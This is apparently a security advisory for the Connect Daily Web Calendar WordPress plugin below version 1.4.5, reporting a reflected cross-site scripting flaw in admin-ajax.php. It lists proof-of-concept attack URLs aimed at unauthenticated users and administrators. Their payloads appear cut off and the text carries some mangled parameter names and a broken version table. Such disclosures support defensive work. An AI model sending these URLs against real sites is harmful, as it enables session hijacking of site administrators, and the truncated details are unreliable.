The plugin does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).
1. Create a new calendar in the plugin’s settings page (most payloads below require at least one calendar to exist) Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below: 1. https://exmple.com/wp-admin/admin-ajax.php?action=cdaily&subaction;=cd_displayday&callback;=1&bymethod;=&by;_id=/../../../../../../r%26_=--> 2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction;=cd_calendar&id;=XX"> 3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction;=cd_dismisshint&callback;=
CPE | Name | Operator | Version |
---|---|---|---|
connect-daily-web-calendar | lt | 1.4.5 |